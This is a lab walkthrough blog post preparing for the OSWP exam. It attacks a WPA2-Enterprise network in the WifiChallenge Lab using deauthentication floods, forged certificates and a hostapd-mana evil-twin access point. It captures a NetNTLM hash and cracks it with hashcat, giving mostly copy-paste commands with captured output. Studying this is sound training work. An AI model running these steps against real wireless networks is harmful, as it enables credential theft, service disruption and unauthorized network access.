Summary

This blog post is the second article in a series of three that will serve as preparation for Offsec Wireless Professional (OSWP) exam. This one is a complete walkthrough of the WPA2-MGT challenge delivered by WifiChallenge Lab. Parts 1 and 3 deal with WPA2-PSK and WEP.

Disclaimer

This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The article does not contain any information or examples from the actual OSWP exam. It does provide a framework that you can use to your advantage. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Why this blog?

There are a number of very good articles on study materials that can be used to pass the OSWP exam. The most notable ones are the OSWP playbook (https://zeyadazima.com/notes/oswplaybook/) and the Github page of “The H4ck3r Dude” (https://github.com/TheH4ck3rDude/OSWP-Exam-Notes).

Based on the two articles mentioned above, I have created an easy walkthrough for going through the WPA2-MGT scenario. This walkthrough contains easy ‘copy pastables’. It is set up in such a way that you only need to change the values ​​of the required variables. This reduces errors and is much more efficient.

We will use the challenges from the WifiChallenge Lab (https://lab.wifichallenge.com/). This particular article is about the WPA2-MGT challenge.

Lab environment

This POC consists of just 1 machine: an attacker machine running the latest Docker installation of the WifiChallenge Lab version 2.1. In addition, we need install tools FreeRadius and Hostapd-mana.

I will not explain how install Docker on Kali Linux. You can use the following installation walkthrough: https://www.geeksforgeeks.org/techtips/how-to-install-docker-in-kali-linux/

Create the WifiChallange Lab Docker environment and install additional tools

1. Open a command terminal and copy and paste the commands below:

cd /opt; 
sudo git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose -f docker-compose.yml up

The required Docker containers should be up and running in about 5 minutes.

2. Check if all 4 WifiChallenge Lab Docker containers are running.

docker container ls

3. Check if Kali contains some new (virtual) Wifi interfaces.

iwconfig | grep wlan

4. Install FreeRadius (we need this tool to create certificates for our roque Access Point).

sudo apt install freeradius

5. Install HostApd-mana (with this tool to set up a roque Access Point).

sudo apt install hostapd-mana

Part 1: Enumerate Wifi networks and select a target WPA2-MGT Access Point (AP) to attack

6. Kill processes that may cause problems with airmon-ng (such as NetworkManager). Copy and paste the command below and press enter:

sudo airmon-ng check kill

7. Set wlan0 in monitor mode:

sudo airmon-ng start wlan0

8. Check what Access Points are active on frequency bands 2,4Ghz and 5Ghz.

sudo airodump-ng  --band abg wlan0mon

Results:

We detected 4 potential APs configured as WPA2-MGT (Cipher CCMP). All of them transmit on channel 44 (see column ‘CH’).

9. Check the APs that are transmitting on channel 44.

channel=44
sudo airodump-ng -c ${channel} wlan0mon

In this walkthrough we will attack the wifi network “wifi-corp”.

We found two associated stations with ‘wifi-corp’.

Results:

ESSID = wifi-corp

BSSID = F0:9F:C2:71:22:1A and F0:9F:C2:71:22:15

Station 1 = 64:32:A8:07:6C:40

Station 2 = 64:32:A8:07:6C:41

Part 2: Capture handshake

In this part, we will capture an authentication handshake frame. Later, we will use this to extract the target access point public key information.

10. Open a new terminal tab. Start monitoring specifically on AP ‘wifi-corp’ and dump the output in a capture file. Use copy and paste to execute the following command(s):

channel=44
dumpfile='/tmp/dump-wpa-mgt'
bssid='F0:9F:C2:71:22:1A'
essid='wifi-corp'
sudo rm /tmp/dump-wpa-mgt-01*
sudo airodump-ng -c ${channel}  -w ${dumpfile} --output-format pcap --essid ${essid} --bssid ${bssid} wlan0mon

11. Open a second terminal tab. Send a deauthentication frame to both clients (broadcast). In that case any connected client will try to re-authenticate again during our capture. Use copy and paste to execute the following command(s):

essid='wifi-corp'
sudo aireplay-ng -0 1 -e ${essid} wlan0mon

Next return to terminal 1 and check if a WPA handshake is captured.

12. Press CNTL+C to stop airodump. Stop monitoring on wlan0mon:

sudo airmon-ng stop wlan0mon

Part 3: Extract the server certificate

In this part we will extract the AP public key. We need this information to create certificates for our own (roque) AP.

13. Check if your dumpfile (including the authentication request) is present.

ls -l /tmp/dump-wpa-mgt*

14. Use tshark to extract the public key information from the capture file.

dumpfile='/tmp/dump-wpa-mgt'
bssid='F0:9F:C2:71:22:1A'
tshark -r ${dumpfile}-01.cap -Y "wlan.bssid == ${bssid} && eap && tls.handshake.certificate" -V | grep rdnSequence: -A 1 | head -n 5

We gathered the following information:

CA:

[email protected],

commonName=WiFiChallenge CA,

organizationUnitName=Certificate Authority,

organizationName= WiFiChallenge,

localityName=Madrid,

stateOrProvinceName=Madrid,

countryName=ES

Server:

[email protected],

commonName=WiFiChallenge CA,

organizationUnitName=Server,

organizationName= WiFiChallenge,

localityName= Madrid,

countryName=ES

Part 3: Create certificates based on the target AP certificate information

In this part we will use the extracted AP public key information to create our own certificates. In order to do this, we will use the tool FreeRadius.

15. Modify the default FreeRadius CA certificate. Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

cd /etc/freeradius/3.0/certs
sudo nano  /etc/freeradius/3.0/certs/ca.cnf

16. Scroll down to section [certificate_authority] and modify the default CA information (see step 14 tshark).

[email protected]
commonName= "WiFiChallenge CA"
organizationName= WiFiChallenge
localityName=Madrid
stateOrProvinceName=Madrid
countryName=ES

17. Press CNTL+O and CNTL+X to save the file

18. Modify the default FreeRadius Server certificate configuration file. Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

cd /etc/freeradius/3.0/certs
sudo nano  /etc/freeradius/3.0/certs/server.cnf

19. Scroll down to section [server] and modify the default server certificate (see step 14 tshark)

[email protected]
commonName= "WiFiChallenge CA"
organizationName= WiFiChallenge
localityName= Madrid
countryName=ES

20. Press CNTL+O and CNTL+X to save the file

21. Generate the new certificates. You need the root context to do this. Use copy and paste to execute the following command(s) in the command terminal:

# generate Diffie Hellman key for hostapd-mana (need root rights)
sudo su -
# in root context
cd  /etc/freeradius/3.0/certs
rm dh
openssl dhparam -out dh -2 2048
make

Part 4: Use hostapd-mana to setup a roque Access Point

22. Create an eap-user file to use with hostapd-mana. Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

# create a eap-user file (/tmp/mana.eap_user)
cat << EOF > /tmp/mana.eap_user
* PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]
EOF

23. Create hostapd-mana config file (/tmp/network.config). Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

essid='wifi-corp'
cat << EOF > /tmp/network.conf
# SSID of the AP
ssid=${essid}
# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211
# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)
channel=1
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=g
# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1
# Key workaround for Win XP
eapol_key_index_workaround=0
# EAP user file we created earlier
eap_user_file=/tmp/mana.eap_user
# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh
# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP
# Enable Mana WPE
mana_wpe=1
# Store credentials in that file
mana_credout=/tmp/hostapd.credout
# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1
# EAP TLS MitM
mana_eaptls=1
EOF

24. Next, start up the roque attacker access-point:

sudo ifconfig wlan0 down 
sudo ifconfig wlan0 up
sudo hostapd-mana /tmp/network.conf

Part 5: Have the target clients to connect to our roque access points

If our roque access point is able to transmit with more power than the target access points, we can just sit and wait for a victim station to connect. We may not always be that lucky.

Alternatively, we can force the existing stations to connect to our roque access point. We do this with a denial of service by sending a constant stream of deauthentication frames to all target access points. It is important that we perform this denial of service simultaneously against all access points within the same wifi network (‘wifi-corp’). We want to be sure that our access point is the only one available within the target wifi network.

25. Use aireplay to deauthenticate the clients connected to the first target access point. Open a second (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

bssid='F0:9F:C2:71:22:1A'
essid='wifi-corp'
sudo aireplay-ng -0 0 -e ${essid} -a ${bssid}  wlan1

26. Use aireplay to deauthenticate the clients connected to the second target access point. Open a third (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

bssid='F0:9F:C2:71:22:15'
essid='wifi-corp'
sudo aireplay-ng -0 0 -e ${essid} -a ${bssid}  wlan1

Next return to terminal 1 and check if a victim station is connected.

As you can see two stations tried to connect to our roque access point. The first station did not accept the certificate information of our access point:

SSL: SSL3 alert: read (remote end reported an error):fatal:unknown CA

OpenSSL: openssl_handshake — SSL_connect error:0A000418:SSL routines::tlsv1 alert unknown ca

The second station successfully connected to the attacker access point. We captured the NetNTLM hash in both Hashcat format and JohnTheRipper format

27. Optional: Press CTRL+C to terminate the roque access point.

We gathered the following information:

MANA EAP Identity Phase 1: CONTOSO\juan.tr

MANA EAP EAP-MSCHAPV2 JTR | juan.tr:$NETNTLM$95bf6ccfec26252d$a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:::::::

MANA EAP EAP-MSCHAPV2 HASHCAT | juan.tr::::a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:95bf6ccfec26252d

Part 6: Crack the hashcat NetNTLM hash

We will use hashcat to crack the hashcat NetNTLM hash we captured.

28. Download rockyou.txt. Note: On the OWSP exam, the JohnTheRipper wordlist ‘/usr/share/john/password.lst’ is good enough.

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O /tmp/rockyou.txt

29. Use hashcat to crack the WPA2 authentication request. Use copy and paste to execute the following command(s):

echo -n  juan.tr::::a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:95bf6ccfec26252d > /tmp/hashcat.txt
wordlist='/tmp/rockyou.txt'
hashcat -a 0 -m 5500 /tmp/hashcat.txt ${wordlist} --force

Result:

We cracked the WPA2 key: ‘bulldogs1234’

Part 6: connect to the target network

In this final section, we will try to connect to the target network and dowload the proof.txt file.

30. Create a network configuration file. Use copy and paste to execute the following command(s) in the command terminal:

wpa_key='bulldogs1234'
id='CONTOSO\juan.tr'
essid='wifi-corp'
cat << EOF > /tmp/client.conf
network={
  ssid="${essid}"
  scan_ssid=1
  key_mgmt=WPA-EAP
  eap=PEAP
  identity="${id}"
  password="${wpa_key}"
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}
EOF

31. Next, use network configuration file with the tool ‘wpa_suppliant’ and connect to the target WPA2 network. Copy and paste the following command:

sudo wpa_supplicant -i wlan0 -c /tmp/client.conf

32. Get a valid ip-address on interface wlan0.

sudo dhclient wlan0 -v

33. Download the proof.txt file. On the OSWP exam, the target ip-address (for every scenario) is always 192.168.1.1. For illustration purposes only, we will try to download the proof.txt file from target 192.168.6.1.

target=192.168.6.1
curl http://${target}/proof.txt

That was it. I hope this was useful. Good luck with the exam!

References

· https://lab.wifichallenge.com

· https://www.offsec.com/courses/pen-210/

· https://zeyadazima.com/notes/oswplaybook

· https://github.com/TheH4ck3rDude/OSWP-Exam-Notes